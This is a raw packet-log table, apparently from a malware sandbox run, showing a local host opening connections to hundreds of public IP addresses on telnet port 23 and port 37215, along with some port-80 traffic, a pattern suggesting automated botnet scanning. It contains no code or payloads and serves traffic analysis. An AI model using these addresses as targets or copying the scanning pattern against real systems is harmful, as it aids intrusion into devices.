                                                Dec 3, 2024 22:16:48.654058933 CET3796323192.168.2.2368.126.69.120
                                                Dec 3, 2024 22:16:48.654056072 CET3796323192.168.2.23194.16.66.30
                                                Dec 3, 2024 22:16:48.654056072 CET3796323192.168.2.23145.101.160.88
                                                Dec 3, 2024 22:16:48.654058933 CET3796323192.168.2.23114.38.238.21
                                                Dec 3, 2024 22:16:48.654056072 CET3796323192.168.2.23173.93.160.242
                                                Dec 3, 2024 22:16:48.654058933 CET3796323192.168.2.23172.106.16.96
                                                Dec 3, 2024 22:16:48.654056072 CET3796323192.168.2.2380.114.222.89
                                                Dec 3, 2024 22:16:48.654058933 CET3796323192.168.2.23200.23.200.137
                                                Dec 3, 2024 22:16:48.654056072 CET3796323192.168.2.23211.51.2.37
                                                Dec 3, 2024 22:16:48.654058933 CET3796323192.168.2.23156.67.143.156
                                                Dec 3, 2024 22:16:48.654056072 CET3796323192.168.2.23100.165.140.80
                                                Dec 3, 2024 22:16:48.654056072 CET3796323192.168.2.23116.62.205.226
                                                Dec 3, 2024 22:16:48.654081106 CET3796323192.168.2.23174.174.189.196
                                                Dec 3, 2024 22:16:48.654081106 CET3796323192.168.2.23147.233.217.98
                                                Dec 3, 2024 22:16:48.654081106 CET3796323192.168.2.23144.183.11.49
                                                Dec 3, 2024 22:16:48.654086113 CET3796323192.168.2.23102.139.118.22
                                                Dec 3, 2024 22:16:48.654086113 CET3796323192.168.2.23185.83.141.237
                                                Dec 3, 2024 22:16:48.654099941 CET3796323192.168.2.23168.182.209.2
                                                Dec 3, 2024 22:16:48.654099941 CET3796323192.168.2.2390.253.9.46
                                                Dec 3, 2024 22:16:48.654099941 CET3796323192.168.2.23179.150.123.189
                                                Dec 3, 2024 22:16:48.654099941 CET3796323192.168.2.23197.196.170.56
                                                Dec 3, 2024 22:16:48.654099941 CET3796323192.168.2.2324.244.50.11
                                                Dec 3, 2024 22:16:48.654103994 CET3796323192.168.2.23166.2.228.125
                                                Dec 3, 2024 22:16:48.654103994 CET3796323192.168.2.23223.227.240.205
                                                Dec 3, 2024 22:16:48.654103994 CET3796323192.168.2.2385.232.135.10
                                                Dec 3, 2024 22:16:48.654103994 CET3796323192.168.2.23163.2.87.156
                                                Dec 3, 2024 22:16:48.654103994 CET3796323192.168.2.2365.106.198.126
                                                Dec 3, 2024 22:16:48.654104948 CET3796323192.168.2.23152.33.210.19
                                                Dec 3, 2024 22:16:48.654105902 CET3796323192.168.2.23219.54.121.94
                                                Dec 3, 2024 22:16:48.654104948 CET3796323192.168.2.2312.134.197.91
                                                Dec 3, 2024 22:16:48.654105902 CET3796323192.168.2.23121.176.42.54
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.23176.7.176.75
                                                Dec 3, 2024 22:16:48.654105902 CET3796323192.168.2.2327.118.124.22
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.23194.239.150.253
                                                Dec 3, 2024 22:16:48.654105902 CET3796323192.168.2.2350.193.156.43
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.2312.20.57.45
                                                Dec 3, 2024 22:16:48.654104948 CET3796323192.168.2.23122.8.0.18
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.23131.102.154.43
                                                Dec 3, 2024 22:16:48.654114962 CET3796323192.168.2.2334.223.36.193
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.23112.101.185.128
                                                Dec 3, 2024 22:16:48.654105902 CET3796323192.168.2.23114.197.100.150
                                                Dec 3, 2024 22:16:48.654109001 CET3796323192.168.2.23154.41.208.89
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.234.5.105.74
                                                Dec 3, 2024 22:16:48.654104948 CET3796323192.168.2.2340.100.94.16
                                                Dec 3, 2024 22:16:48.654109001 CET3796323192.168.2.23125.134.68.99
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.2364.172.90.171
                                                Dec 3, 2024 22:16:48.654109001 CET3796323192.168.2.23116.97.88.215
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.239.203.9.104
                                                Dec 3, 2024 22:16:48.654104948 CET3796323192.168.2.23220.14.172.166
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.23152.101.244.104
                                                Dec 3, 2024 22:16:48.654104948 CET3796323192.168.2.23221.226.56.104
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.23162.206.166.167
                                                Dec 3, 2024 22:16:48.654104948 CET3796323192.168.2.23137.174.92.255
                                                Dec 3, 2024 22:16:48.654105902 CET3796323192.168.2.2397.118.55.116
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.2345.72.241.196
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.2369.37.225.27
                                                Dec 3, 2024 22:16:48.654107094 CET3796323192.168.2.23208.105.66.137
                                                Dec 3, 2024 22:16:48.654133081 CET3796323192.168.2.23166.25.41.104
                                                Dec 3, 2024 22:16:48.654133081 CET3796323192.168.2.2391.41.52.6
                                                Dec 3, 2024 22:16:48.654133081 CET3796323192.168.2.2348.252.201.99
                                                Dec 3, 2024 22:16:48.654133081 CET3796323192.168.2.23133.101.149.116
                                                Dec 3, 2024 22:16:48.654133081 CET3796323192.168.2.2357.129.43.53
                                                Dec 3, 2024 22:16:48.654134035 CET3796323192.168.2.23154.246.108.151
                                                Dec 3, 2024 22:16:48.654134035 CET3796323192.168.2.23115.64.221.31
                                                Dec 3, 2024 22:16:48.654134035 CET3796323192.168.2.2359.81.217.128
                                                Dec 3, 2024 22:16:48.654134035 CET3796323192.168.2.23178.185.108.211
                                                Dec 3, 2024 22:16:48.654144049 CET3796323192.168.2.23121.255.60.8
                                                Dec 3, 2024 22:16:48.654144049 CET3796323192.168.2.23146.41.127.40
                                                Dec 3, 2024 22:16:48.654144049 CET3796323192.168.2.23195.228.231.42
                                                Dec 3, 2024 22:16:48.654148102 CET3796323192.168.2.23188.114.131.212
                                                Dec 3, 2024 22:16:48.654149055 CET3796323192.168.2.2365.99.107.98
                                                Dec 3, 2024 22:16:48.654149055 CET3796323192.168.2.2332.225.99.107
                                                Dec 3, 2024 22:16:48.654149055 CET3796323192.168.2.23107.135.167.33
                                                Dec 3, 2024 22:16:48.654149055 CET3796323192.168.2.2376.116.96.125
                                                Dec 3, 2024 22:16:48.654149055 CET3796323192.168.2.2346.45.6.29
                                                Dec 3, 2024 22:16:48.654149055 CET3796323192.168.2.23155.239.251.22
                                                Dec 3, 2024 22:16:48.654150963 CET3796323192.168.2.2399.22.188.236
                                                Dec 3, 2024 22:16:48.654150963 CET3796323192.168.2.23118.80.53.153
                                                Dec 3, 2024 22:16:48.654150963 CET3796323192.168.2.23163.37.72.95
                                                Dec 3, 2024 22:16:48.654150963 CET3796323192.168.2.23128.13.165.223
                                                Dec 3, 2024 22:16:48.654151917 CET3796323192.168.2.23183.223.38.254
                                                Dec 3, 2024 22:16:48.654153109 CET3796323192.168.2.2392.56.22.173
                                                Dec 3, 2024 22:16:48.654151917 CET3796323192.168.2.23178.49.48.212
                                                Dec 3, 2024 22:16:48.654153109 CET3796323192.168.2.23164.108.236.30
                                                Dec 3, 2024 22:16:48.654151917 CET3796323192.168.2.23156.139.140.126
                                                Dec 3, 2024 22:16:48.654153109 CET3796323192.168.2.23153.164.42.177
                                                Dec 3, 2024 22:16:48.654151917 CET3796323192.168.2.23173.202.124.79
                                                Dec 3, 2024 22:16:48.695487976 CET8050084141.23.106.58192.168.2.23
                                                Dec 3, 2024 22:16:48.695499897 CET803455444.97.239.58192.168.2.23
                                                Dec 3, 2024 22:16:48.720458984 CET805480269.105.106.1192.168.2.23
                                                Dec 3, 2024 22:16:48.720468998 CET804400293.134.211.187192.168.2.23
                                                Dec 3, 2024 22:16:48.728666067 CET803657853.119.123.13192.168.2.23
                                                Dec 3, 2024 22:16:48.729103088 CET803674853.119.123.13192.168.2.23
                                                Dec 3, 2024 22:16:48.729182959 CET3674880192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.729257107 CET3674880192.168.2.2353.119.123.13
                                                Dec 3, 2024 22:16:48.729464054 CET805790423.13.227.180192.168.2.23
                                                Dec 3, 2024 22:16:48.729716063 CET805807423.13.227.180192.168.2.23
                                                Dec 3, 2024 22:16:48.729772091 CET5807480192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.729816914 CET5807480192.168.2.2323.13.227.180
                                                Dec 3, 2024 22:16:48.729998112 CET8041946108.128.143.21192.168.2.23
                                                Dec 3, 2024 22:16:48.730189085 CET8042116108.128.143.21192.168.2.23
                                                Dec 3, 2024 22:16:48.730232954 CET4211680192.168.2.23108.128.143.21
                                                Dec 3, 2024 22:16:48.730254889 CET4211680192.168.2.23108.128.143.21
                                                Dec 3, 2024 22:16:48.730561018 CET8038168136.30.197.42192.168.2.23
                                                Dec 3, 2024 22:16:48.730885029 CET8038338136.30.197.42192.168.2.23
                                                Dec 3, 2024 22:16:48.730927944 CET3833880192.168.2.23136.30.197.42
                                                Dec 3, 2024 22:16:48.730945110 CET3833880192.168.2.23136.30.197.42
                                                Dec 3, 2024 22:16:48.731785059 CET805380446.29.80.182192.168.2.23
                                                Dec 3, 2024 22:16:48.731890917 CET805397446.29.80.182192.168.2.23
                                                Dec 3, 2024 22:16:48.731933117 CET5397480192.168.2.2346.29.80.182
                                                Dec 3, 2024 22:16:48.731944084 CET80513325.50.172.102192.168.2.23
                                                Dec 3, 2024 22:16:48.731955051 CET5397480192.168.2.2346.29.80.182
                                                Dec 3, 2024 22:16:48.731985092 CET80515025.50.172.102192.168.2.23
                                                Dec 3, 2024 22:16:48.732021093 CET5150280192.168.2.235.50.172.102
                                                Dec 3, 2024 22:16:48.732039928 CET5150280192.168.2.235.50.172.102
                                                Dec 3, 2024 22:16:48.732332945 CET8035632217.15.168.25192.168.2.23
                                                Dec 3, 2024 22:16:48.732542038 CET8035802217.15.168.25192.168.2.23
                                                Dec 3, 2024 22:16:48.732588053 CET3580280192.168.2.23217.15.168.25
                                                Dec 3, 2024 22:16:48.732614994 CET3580280192.168.2.23217.15.168.25
                                                Dec 3, 2024 22:16:48.732975006 CET8056994106.125.175.246192.168.2.23
                                                Dec 3, 2024 22:16:48.733186960 CET8057164106.125.175.246192.168.2.23
                                                Dec 3, 2024 22:16:48.733232975 CET5716480192.168.2.23106.125.175.246
                                                Dec 3, 2024 22:16:48.733263016 CET5716480192.168.2.23106.125.175.246
                                                Dec 3, 2024 22:16:48.733489990 CET8058950213.10.8.153192.168.2.23
                                                Dec 3, 2024 22:16:48.739305019 CET8049430142.163.169.148192.168.2.23
                                                Dec 3, 2024 22:16:48.739576101 CET8049576142.163.169.148192.168.2.23
                                                Dec 3, 2024 22:16:48.739619017 CET4957680192.168.2.23142.163.169.148
                                                Dec 3, 2024 22:16:48.739631891 CET4957680192.168.2.23142.163.169.148
                                                Dec 3, 2024 22:16:48.743495941 CET3745137215192.168.2.2341.7.124.25
                                                Dec 3, 2024 22:16:48.743505001 CET3745137215192.168.2.23197.193.108.120
                                                Dec 3, 2024 22:16:48.743505001 CET3745137215192.168.2.23197.166.40.133
                                                Dec 3, 2024 22:16:48.743511915 CET3745137215192.168.2.23197.26.74.237
                                                Dec 3, 2024 22:16:48.743518114 CET3745137215192.168.2.2341.30.218.207
                                                Dec 3, 2024 22:16:48.743525982 CET3745137215192.168.2.2341.164.221.141
                                                Dec 3, 2024 22:16:48.743525982 CET3745137215192.168.2.2341.57.3.15
                                                Dec 3, 2024 22:16:48.743525982 CET3745137215192.168.2.2341.112.140.205
                                                Dec 3, 2024 22:16:48.743530989 CET3745137215192.168.2.23197.132.62.119
                                                Dec 3, 2024 22:16:48.743530989 CET3745137215192.168.2.23156.170.127.69
                                                Dec 3, 2024 22:16:48.743531942 CET3745137215192.168.2.23156.81.76.10
                                                Dec 3, 2024 22:16:48.743531942 CET3745137215192.168.2.23156.126.99.239
                                                Dec 3, 2024 22:16:48.743534088 CET3745137215192.168.2.2341.190.250.172
                                                Dec 3, 2024 22:16:48.743535995 CET3745137215192.168.2.2341.138.142.196
                                                Dec 3, 2024 22:16:48.743541956 CET3745137215192.168.2.2341.226.205.157
                                                Dec 3, 2024 22:16:48.743541956 CET3745137215192.168.2.23197.155.45.199
                                                Dec 3, 2024 22:16:48.743546009 CET3745137215192.168.2.2341.158.177.7
                                                Dec 3, 2024 22:16:48.743549109 CET3745137215192.168.2.23156.225.232.78
                                                Dec 3, 2024 22:16:48.743549109 CET3745137215192.168.2.23156.178.84.20
                                                Dec 3, 2024 22:16:48.743550062 CET3745137215192.168.2.23156.228.204.151
                                                Dec 3, 2024 22:16:48.743552923 CET3745137215192.168.2.23197.83.229.192
                                                Dec 3, 2024 22:16:48.743552923 CET3745137215192.168.2.23156.207.229.56
                                                Dec 3, 2024 22:16:48.743563890 CET3745137215192.168.2.23197.159.57.162
                                                Dec 3, 2024 22:16:48.743566990 CET3745137215192.168.2.2341.149.56.239
                                                Dec 3, 2024 22:16:48.743572950 CET3745137215192.168.2.23197.253.247.193
                                                Dec 3, 2024 22:16:48.743586063 CET3745137215192.168.2.2341.66.21.149
                                                Dec 3, 2024 22:16:48.743592024 CET3745137215192.168.2.2341.145.204.102
                                                Dec 3, 2024 22:16:48.743602991 CET3745137215192.168.2.23156.96.69.95
                                                Dec 3, 2024 22:16:48.743607044 CET3745137215192.168.2.2341.216.117.132
                                                Dec 3, 2024 22:16:48.743619919 CET3745137215192.168.2.23156.40.246.169
                                                Dec 3, 2024 22:16:48.743622065 CET3745137215192.168.2.23197.38.104.44
                                                Dec 3, 2024 22:16:48.743626118 CET3745137215192.168.2.2341.33.18.243
                                                Dec 3, 2024 22:16:48.743632078 CET3745137215192.168.2.23197.211.22.41
                                                Dec 3, 2024 22:16:48.743632078 CET3745137215192.168.2.23197.139.135.17
                                                Dec 3, 2024 22:16:48.743633986 CET3745137215192.168.2.2341.207.10.62
                                                Dec 3, 2024 22:16:48.743649960 CET3745137215192.168.2.23156.84.112.122
                                                Dec 3, 2024 22:16:48.743650913 CET3745137215192.168.2.2341.10.246.105
                                                Dec 3, 2024 22:16:48.743652105 CET3745137215192.168.2.23156.168.240.233
                                                Dec 3, 2024 22:16:48.743663073 CET3745137215192.168.2.23156.206.57.171
                                                Dec 3, 2024 22:16:48.743671894 CET3745137215192.168.2.23156.64.221.21
                                                Dec 3, 2024 22:16:48.743674040 CET3745137215192.168.2.2341.48.143.138
                                                Dec 3, 2024 22:16:48.743675947 CET3745137215192.168.2.2341.18.84.50
                                                Dec 3, 2024 22:16:48.743680954 CET3745137215192.168.2.2341.184.232.48
                                                Dec 3, 2024 22:16:48.743691921 CET3745137215192.168.2.2341.102.70.251
                                                Dec 3, 2024 22:16:48.743700981 CET3745137215192.168.2.23156.30.146.236
                                                Dec 3, 2024 22:16:48.743710995 CET3745137215192.168.2.2341.158.189.50
                                                Dec 3, 2024 22:16:48.743719101 CET3745137215192.168.2.2341.136.245.84
                                                Dec 3, 2024 22:16:48.743729115 CET3745137215192.168.2.23156.88.195.191
                                                Dec 3, 2024 22:16:48.743738890 CET3745137215192.168.2.2341.6.20.209
                                                Dec 3, 2024 22:16:48.743738890 CET3745137215192.168.2.2341.26.125.244
                                                Dec 3, 2024 22:16:48.743752003 CET3745137215192.168.2.2341.27.7.86
                                                Dec 3, 2024 22:16:48.743752003 CET3745137215192.168.2.23197.236.133.43
                                                Dec 3, 2024 22:16:48.743753910 CET3745137215192.168.2.2341.64.31.64
                                                Dec 3, 2024 22:16:48.743760109 CET3745137215192.168.2.23156.226.37.13
                                                Dec 3, 2024 22:16:48.743776083 CET3745137215192.168.2.2341.128.212.101
                                                Dec 3, 2024 22:16:48.743778944 CET3745137215192.168.2.2341.181.172.247
                                                Dec 3, 2024 22:16:48.743782043 CET3745137215192.168.2.2341.18.239.223
                                                Dec 3, 2024 22:16:48.743789911 CET3745137215192.168.2.2341.23.206.95
                                                Dec 3, 2024 22:16:48.743794918 CET3745137215192.168.2.23197.159.164.51
                                                Dec 3, 2024 22:16:48.743803024 CET3745137215192.168.2.2341.106.124.30
                                                Dec 3, 2024 22:16:48.743814945 CET3745137215192.168.2.2341.222.140.56
                                                Dec 3, 2024 22:16:48.743817091 CET3745137215192.168.2.2341.110.74.114
                                                Dec 3, 2024 22:16:48.743823051 CET3745137215192.168.2.2341.52.150.93
                                                Dec 3, 2024 22:16:48.743833065 CET3745137215192.168.2.2341.229.86.17
                                                Dec 3, 2024 22:16:48.743837118 CET3745137215192.168.2.23197.172.105.198
                                                Dec 3, 2024 22:16:48.743845940 CET3745137215192.168.2.23197.238.89.130
                                                Dec 3, 2024 22:16:48.743855953 CET3745137215192.168.2.2341.34.132.146
                                                Dec 3, 2024 22:16:48.743859053 CET3745137215192.168.2.23197.80.74.9
                                                Dec 3, 2024 22:16:48.743865013 CET3745137215192.168.2.2341.25.5.218
                                                Dec 3, 2024 22:16:48.743865013 CET3745137215192.168.2.23156.21.226.185
                                                Dec 3, 2024 22:16:48.743869066 CET3745137215192.168.2.23156.219.71.26
                                                Dec 3, 2024 22:16:48.743870020 CET3745137215192.168.2.23197.34.177.236
                                                Dec 3, 2024 22:16:48.743877888 CET3745137215192.168.2.23156.104.218.190
                                                Dec 3, 2024 22:16:48.743889093 CET3745137215192.168.2.23156.149.247.27
                                                Dec 3, 2024 22:16:48.743895054 CET3745137215192.168.2.23197.82.236.138
                                                Dec 3, 2024 22:16:48.743897915 CET3745137215192.168.2.23156.105.78.227
                                                Dec 3, 2024 22:16:48.743897915 CET3745137215192.168.2.2341.166.148.85
                                                Dec 3, 2024 22:16:48.743899107 CET3745137215192.168.2.23156.95.52.42
                                                Dec 3, 2024 22:16:48.743899107 CET3745137215192.168.2.23197.92.127.7
                                                Dec 3, 2024 22:16:48.743901014 CET3745137215192.168.2.23156.115.146.91
                                                Dec 3, 2024 22:16:48.743906021 CET3745137215192.168.2.23156.224.180.63
                                                Dec 3, 2024 22:16:48.743925095 CET3745137215192.168.2.23197.97.213.178
                                                Dec 3, 2024 22:16:48.743937969 CET3745137215192.168.2.2341.38.4.65
                                                Dec 3, 2024 22:16:48.743942976 CET3745137215192.168.2.23197.151.108.190
                                                Dec 3, 2024 22:16:48.743944883 CET3745137215192.168.2.23197.173.132.88
                                                Dec 3, 2024 22:16:48.743944883 CET3745137215192.168.2.2341.55.184.106
                                                Dec 3, 2024 22:16:48.743961096 CET3745137215192.168.2.23197.62.197.188
                                                Dec 3, 2024 22:16:48.743963957 CET3745137215192.168.2.2341.111.3.69
                                                Dec 3, 2024 22:16:48.743968964 CET3745137215192.168.2.2341.17.201.70
                                                Dec 3, 2024 22:16:48.743983030 CET3745137215192.168.2.23197.20.191.98
                                                Dec 3, 2024 22:16:48.743987083 CET3745137215192.168.2.23156.252.48.174
                                                Dec 3, 2024 22:16:48.743995905 CET3745137215192.168.2.2341.129.127.243
                                                Dec 3, 2024 22:16:48.744008064 CET3745137215192.168.2.2341.42.178.233
                                                Dec 3, 2024 22:16:48.744019032 CET3745137215192.168.2.23197.77.21.65
                                                Dec 3, 2024 22:16:48.744025946 CET3745137215192.168.2.2341.85.55.135
                                                Dec 3, 2024 22:16:48.744029045 CET3745137215192.168.2.23197.39.156.119
                                                Dec 3, 2024 22:16:48.744038105 CET3745137215192.168.2.23156.24.150.255
                                                Dec 3, 2024 22:16:48.744041920 CET3745137215192.168.2.2341.224.4.143
                                                Dec 3, 2024 22:16:48.744050026 CET3745137215192.168.2.23197.159.157.175
                                                Dec 3, 2024 22:16:48.744051933 CET3745137215192.168.2.2341.34.45.191
                                                Dec 3, 2024 22:16:48.744052887 CET3745137215192.168.2.2341.145.97.10
                                                Dec 3, 2024 22:16:48.744060040 CET3745137215192.168.2.2341.246.146.170
                                                Dec 3, 2024 22:16:48.744069099 CET3745137215192.168.2.23197.221.125.52
                                                Dec 3, 2024 22:16:48.744070053 CET3745137215192.168.2.23156.46.1.73
                                                Dec 3, 2024 22:16:48.744085073 CET3745137215192.168.2.2341.183.18.176
                                                Dec 3, 2024 22:16:48.744086981 CET3745137215192.168.2.2341.62.231.222
                                                Dec 3, 2024 22:16:48.744091988 CET3745137215192.168.2.23197.136.100.78
                                                Dec 3, 2024 22:16:48.744106054 CET3745137215192.168.2.23156.38.120.149
                                                Dec 3, 2024 22:16:48.744106054 CET3745137215192.168.2.23197.76.44.237
                                                Dec 3, 2024 22:16:48.744107962 CET3745137215192.168.2.2341.254.1.171
                                                Dec 3, 2024 22:16:48.744111061 CET3745137215192.168.2.23156.238.115.135
                                                Dec 3, 2024 22:16:48.744124889 CET3745137215192.168.2.23197.8.214.31
                                                Dec 3, 2024 22:16:48.744127989 CET3745137215192.168.2.23197.228.44.51
                                                Dec 3, 2024 22:16:48.744131088 CET3745137215192.168.2.2341.152.49.180
                                                Dec 3, 2024 22:16:48.744147062 CET3745137215192.168.2.23156.237.254.10
                                                Dec 3, 2024 22:16:48.744153023 CET3745137215192.168.2.23156.203.12.96
                                                Dec 3, 2024 22:16:48.744163036 CET3745137215192.168.2.23156.218.125.65
                                                Dec 3, 2024 22:16:48.744167089 CET3745137215192.168.2.2341.45.251.223
                                                Dec 3, 2024 22:16:48.744172096 CET3745137215192.168.2.2341.35.149.106
                                                Dec 3, 2024 22:16:48.744178057 CET3745137215192.168.2.23156.241.53.180
                                                Dec 3, 2024 22:16:48.744179964 CET3745137215192.168.2.2341.216.188.161
                                                Dec 3, 2024 22:16:48.744194031 CET3745137215192.168.2.23197.84.114.151
                                                Dec 3, 2024 22:16:48.744198084 CET3745137215192.168.2.2341.12.132.84
                                                Dec 3, 2024 22:16:48.744216919 CET3745137215192.168.2.2341.224.225.139
                                                Dec 3, 2024 22:16:48.744218111 CET3745137215192.168.2.23197.154.32.14
                                                Dec 3, 2024 22:16:48.744225025 CET3745137215192.168.2.2341.223.148.207
                                                Dec 3, 2024 22:16:48.744225025 CET3745137215192.168.2.23197.161.238.6
                                                Dec 3, 2024 22:16:48.744225979 CET3745137215192.168.2.23197.84.227.158
                                                Dec 3, 2024 22:16:48.744237900 CET3745137215192.168.2.23197.101.125.130
                                                Dec 3, 2024 22:16:48.744240999 CET3745137215192.168.2.23156.143.20.52
                                                Dec 3, 2024 22:16:48.744246960 CET3745137215192.168.2.23197.83.148.199
                                                Dec 3, 2024 22:16:48.744259119 CET3745137215192.168.2.23197.98.201.240
                                                Dec 3, 2024 22:16:48.744266987 CET3745137215192.168.2.2341.209.16.98
                                                Dec 3, 2024 22:16:48.744267941 CET3745137215192.168.2.23156.229.39.31
                                                Dec 3, 2024 22:16:48.744273901 CET3745137215192.168.2.23197.250.156.29
                                                Dec 3, 2024 22:16:48.744287014 CET3745137215192.168.2.2341.43.111.145
                                                Dec 3, 2024 22:16:48.744292974 CET3745137215192.168.2.23197.195.162.149
                                                Dec 3, 2024 22:16:48.744298935 CET3745137215192.168.2.23156.159.180.221
                                                Dec 3, 2024 22:16:48.744313955 CET3745137215192.168.2.2341.76.126.249
                                                Dec 3, 2024 22:16:48.744316101 CET3745137215192.168.2.2341.184.60.224
                                                Dec 3, 2024 22:16:48.744323015 CET3745137215192.168.2.23197.149.17.241
                                                Dec 3, 2024 22:16:48.744328022 CET3745137215192.168.2.2341.206.38.215
                                                Dec 3, 2024 22:16:48.744329929 CET3745137215192.168.2.23197.66.116.187
                                                Dec 3, 2024 22:16:48.744347095 CET3745137215192.168.2.2341.228.2.130
                                                Dec 3, 2024 22:16:48.744347095 CET3745137215192.168.2.23156.21.166.10
                                                Dec 3, 2024 22:16:48.744347095 CET3745137215192.168.2.23197.102.180.176
                                                Dec 3, 2024 22:16:48.744359970 CET3745137215192.168.2.2341.136.194.57
                                                Dec 3, 2024 22:16:48.744369984 CET3745137215192.168.2.23156.166.176.111
                                                Dec 3, 2024 22:16:48.744374037 CET3745137215192.168.2.2341.75.199.87
                                                Dec 3, 2024 22:16:48.744374990 CET3745137215192.168.2.23156.80.79.110
                                                Dec 3, 2024 22:16:48.744383097 CET3745137215192.168.2.23156.121.106.34
                                                Dec 3, 2024 22:16:48.744395018 CET3745137215192.168.2.2341.95.217.132
                                                Dec 3, 2024 22:16:48.744395971 CET3745137215192.168.2.23156.51.179.130
                                                Dec 3, 2024 22:16:48.744407892 CET3745137215192.168.2.2341.0.95.92
                                                Dec 3, 2024 22:16:48.744416952 CET3745137215192.168.2.23156.168.127.87
                                                Dec 3, 2024 22:16:48.744419098 CET3745137215192.168.2.23156.251.117.203
                                                Dec 3, 2024 22:16:48.744426012 CET3745137215192.168.2.2341.117.9.3
                                                Dec 3, 2024 22:16:48.744452000 CET3745137215192.168.2.2341.52.187.154
                                                Dec 3, 2024 22:16:48.744452953 CET3745137215192.168.2.2341.36.199.127
                                                Dec 3, 2024 22:16:48.744458914 CET3745137215192.168.2.2341.199.30.167
                                                Dec 3, 2024 22:16:48.744461060 CET3745137215192.168.2.23197.113.64.177
                                                Dec 3, 2024 22:16:48.744476080 CET3745137215192.168.2.23156.135.89.226
                                                Dec 3, 2024 22:16:48.744476080 CET3745137215192.168.2.23156.47.147.32
                                                Dec 3, 2024 22:16:48.744482040 CET3745137215192.168.2.2341.132.33.250
                                                Dec 3, 2024 22:16:48.744487047 CET3745137215192.168.2.2341.163.235.142
                                                Dec 3, 2024 22:16:48.744492054 CET3745137215192.168.2.2341.5.153.148
                                                Dec 3, 2024 22:16:48.744505882 CET3745137215192.168.2.23197.52.40.155
                                                Dec 3, 2024 22:16:48.744509935 CET3745137215192.168.2.23156.108.219.243
                                                Dec 3, 2024 22:16:48.744517088 CET3745137215192.168.2.23197.236.103.7
                                                Dec 3, 2024 22:16:48.744524956 CET3745137215192.168.2.2341.212.149.78
                                                Dec 3, 2024 22:16:48.744529963 CET3745137215192.168.2.23156.111.48.250
                                                Dec 3, 2024 22:16:48.744544983 CET3745137215192.168.2.2341.244.207.118
                                                Dec 3, 2024 22:16:48.744553089 CET3745137215192.168.2.23197.160.244.97
                                                Dec 3, 2024 22:16:48.744559050 CET3745137215192.168.2.23197.79.109.121
                                                Dec 3, 2024 22:16:48.744560003 CET3745137215192.168.2.23197.57.227.139
                                                Dec 3, 2024 22:16:48.744570971 CET3745137215192.168.2.2341.36.131.29
                                                Dec 3, 2024 22:16:48.744577885 CET3745137215192.168.2.2341.83.16.16
                                                Dec 3, 2024 22:16:48.744582891 CET3745137215192.168.2.2341.180.67.134
                                                Dec 3, 2024 22:16:48.744592905 CET3745137215192.168.2.23156.154.4.25
                                                Dec 3, 2024 22:16:48.744606018 CET3745137215192.168.2.23156.217.6.88
                                                Dec 3, 2024 22:16:48.744617939 CET3745137215192.168.2.23197.172.174.57
                                                Dec 3, 2024 22:16:48.744621038 CET3745137215192.168.2.2341.85.32.45
                                                Dec 3, 2024 22:16:48.744632959 CET3745137215192.168.2.2341.92.84.108
                                                Dec 3, 2024 22:16:48.744632959 CET3745137215192.168.2.23197.250.179.52
                                                Dec 3, 2024 22:16:48.744640112 CET3745137215192.168.2.23156.230.255.49
                                                Dec 3, 2024 22:16:48.744641066 CET3745137215192.168.2.2341.120.44.63
                                                Dec 3, 2024 22:16:48.744657993 CET3745137215192.168.2.23197.3.190.56
                                                Dec 3, 2024 22:16:48.744657993 CET3745137215192.168.2.23197.168.37.126
                                                Dec 3, 2024 22:16:48.744666100 CET3745137215192.168.2.2341.155.55.186
                                                Dec 3, 2024 22:16:48.744676113 CET3745137215192.168.2.23156.104.78.77
                                                Dec 3, 2024 22:16:48.744682074 CET3745137215192.168.2.23156.169.199.249
                                                Dec 3, 2024 22:16:48.744688034 CET3745137215192.168.2.2341.152.161.251
                                                Dec 3, 2024 22:16:48.744693995 CET3745137215192.168.2.23197.68.244.218
                                                Dec 3, 2024 22:16:48.744693995 CET3745137215192.168.2.23197.93.51.119
                                                Dec 3, 2024 22:16:48.744698048 CET3745137215192.168.2.2341.28.17.169
                                                Dec 3, 2024 22:16:48.744698048 CET3745137215192.168.2.2341.89.154.33
                                                Dec 3, 2024 22:16:48.744709969 CET3745137215192.168.2.23156.46.149.154
                                                Dec 3, 2024 22:16:48.744714975 CET3745137215192.168.2.23156.228.128.137
                                                Dec 3, 2024 22:16:48.744715929 CET3745137215192.168.2.23156.160.209.55
                                                Dec 3, 2024 22:16:48.744721889 CET3745137215192.168.2.2341.123.41.51
                                                Dec 3, 2024 22:16:48.744724035 CET3745137215192.168.2.23197.52.227.109
                                                Dec 3, 2024 22:16:48.744729996 CET3745137215192.168.2.23156.176.185.217
                                                Dec 3, 2024 22:16:48.744750977 CET3745137215192.168.2.23197.90.127.65
                                                Dec 3, 2024 22:16:48.744750977 CET3745137215192.168.2.2341.46.83.136
                                                Dec 3, 2024 22:16:48.744754076 CET3745137215192.168.2.23197.99.68.166
                                                Dec 3, 2024 22:16:48.744756937 CET3745137215192.168.2.23156.242.128.220
                                                Dec 3, 2024 22:16:48.744767904 CET3745137215192.168.2.2341.7.191.243
                                                Dec 3, 2024 22:16:48.744771004 CET3745137215192.168.2.23156.220.137.80
                                                Dec 3, 2024 22:16:48.744771957 CET3745137215192.168.2.23197.206.111.131
                                                Dec 3, 2024 22:16:48.744782925 CET3745137215192.168.2.23156.237.240.235
                                                Dec 3, 2024 22:16:48.744785070 CET3745137215192.168.2.2341.131.152.168
                                                Dec 3, 2024 22:16:48.744792938 CET3745137215192.168.2.2341.47.85.133
                                                Dec 3, 2024 22:16:48.744798899 CET3745137215192.168.2.23197.216.143.197
                                                Dec 3, 2024 22:16:48.744801998 CET3745137215192.168.2.23197.28.99.17
                                                Dec 3, 2024 22:16:48.744807005 CET3745137215192.168.2.23197.201.236.156
                                                Dec 3, 2024 22:16:48.744816065 CET3745137215192.168.2.23197.130.129.218
